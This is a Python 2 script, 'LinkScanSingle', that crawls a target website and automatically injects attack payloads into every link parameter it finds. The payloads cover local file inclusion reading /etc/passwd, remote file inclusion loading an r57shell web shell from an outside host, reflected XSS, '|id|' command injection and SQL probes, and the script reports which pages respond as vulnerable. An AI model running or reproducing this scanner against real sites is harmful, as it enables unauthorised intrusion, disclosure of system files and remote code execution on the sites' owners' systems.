#!/usr/bin/python #LinkScanSingle will take a site and #collect links from the source. If the link #contains a = it checks LFI,XSS,RFI,SQL,CMD injection #searching source (simple) #If your going to use a different shell then the #one I have supplied, you will need to change line #54 (r57shell) to something in your shell source. from sgmllib import SGMLParser import sys, urllib, httplib, re, urllib2, sets, socket socket.setdefaulttimeout(5) class URLLister(SGMLParser): def reset(self): SGMLParser.reset(self) self.urls = [] def start_a(self, attrs): href = [v for k, v in attrs if k=='href'] if href: self.urls.extend(href) def parse_urls(links): urls = [] for link in links: num = link.count("=") if num > 0: for x in xrange(num): x = x+1 if link[0] == "/" or link[0] == "?": url = site+link.rsplit("=",x)[0]+"=" else: url = link.rsplit("=",x)[0]+"=" if url.find(site.split(".",1)[1]) == -1: url = site+url if url.count("//") > 1: url = "http://"+url[7:].replace("//","/",1) urls.append(url) urls = list(sets.Set(urls)) return urls def main(host): print "\n\t[+] Testing:",host,"\n" try: if verbose == 1: print "[+] Checking XSS" xss(host) except(urllib2.HTTPError, urllib2.URLError), msg: #print "[-] XSS Error:",msg pass try: if verbose == 1: print "[+] Checking LFI" lfi(host) except(urllib2.HTTPError, urllib2.URLError), msg: #print "[-] LFI Error:",msg pass try: if verbose == 1: print "[+] Checking RFI" rfi(host) except(urllib2.HTTPError, urllib2.URLError), msg: #print "[-] RFI Error:",msg pass try: if verbose == 1: print "[+] Checking CMD" cmd(host) except(urllib2.HTTPError, urllib2.URLError), msg: #print "[-] CMD Error:",msg pass try: if verbose == 1: print "[+] Checking SQL" sql(host) except(urllib2.HTTPError, urllib2.URLError), msg: #print "[-] SQL Error:",msg pass def rfi(host): try: source = urllib2.urlopen(host+RFI).read() if re.search("r57shell", source): print "[+] RFI:",host+RFI else: if verbose == 1: print "[-] Not Vuln." except(),msg: #print "[-] Error Occurred",msg pass def xss(host): source = urllib2.urlopen(host+XSS).read() if re.search("XSS", source) != None: print "[!] XSS:",host+XSS else: if verbose == 1: print "[-] Not Vuln." def sql(host): for pload in SQL: source = urllib2.urlopen(host+pload).read() if re.search("Warning:", source) != None: print "[!] SQL:",host+pload else: if verbose == 1: print "[-] Not Vuln." def cmd(host): source = urllib2.urlopen(host+CMD).read() if re.search("uid=", source) != None: print "[!] CMD:",host+CMD else: if verbose == 1: print "[-] Not Vuln." def lfi(host): source = urllib2.urlopen(host+LFI).read() if re.search("root:", source) != None: print "[!] LFI:",host+LFI else: if verbose == 1: print "[-] Not Vuln." source = urllib2.urlopen(host+LFI+"%00").read() if re.search("root:", source) != None: print "[!] LFI:",host+LFI+"%00" else: if verbose == 1: print "[-] Not Vuln. w/ Null Byte" print "\n\t d3hydr8[at]gmail[dot]com LinkScanSingle v1.3" print "\t-------------------------------------------------\n" if len(sys.argv) not in [2,3]: print "Usage : ./linkscan.py [option]" print "Ex: ./linkscan.py www.google.com -verbose" print "\n\t[Option]" print "\t\t-verbose/-v | Verbose Output\n" sys.exit(1) LFI = "../../../../../../../../../../../../etc/passwd" RFI = "http://yozurino.com/r.txt?" RFI_TITLE = "Target" XSS = "%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E" CMD = "|id|" SQL = ["-1","999999"] #Add more or change sql payloads site = sys.argv[1].replace("\n","") print "\n[+] Collecting:",site try: if sys.argv[2].lower() == "-v" or sys.argv[2].lower() == "-verbose": verbose = 1 print "[+] Verbose Mode On\n" except(IndexError): print "[-] Verbose Mode Off\n" verbose = 0 pass site = site.replace("http://","").rsplit("/",1)[0]+"/" site = "http://"+site.lower() try: usock = urllib.urlopen(site) parser = URLLister() parser.feed(usock.read().lower()) parser.close() usock.close() except(IOError, urllib2.URLError), msg: print "[-] Error Connecting to",site print "[-]",msg sys.exit(1) urls = parse_urls(parser.urls) print "[+] Links Found:",len(urls) for url in urls: try: main(url) except(KeyboardInterrupt): pass print "\n[-] Done\n"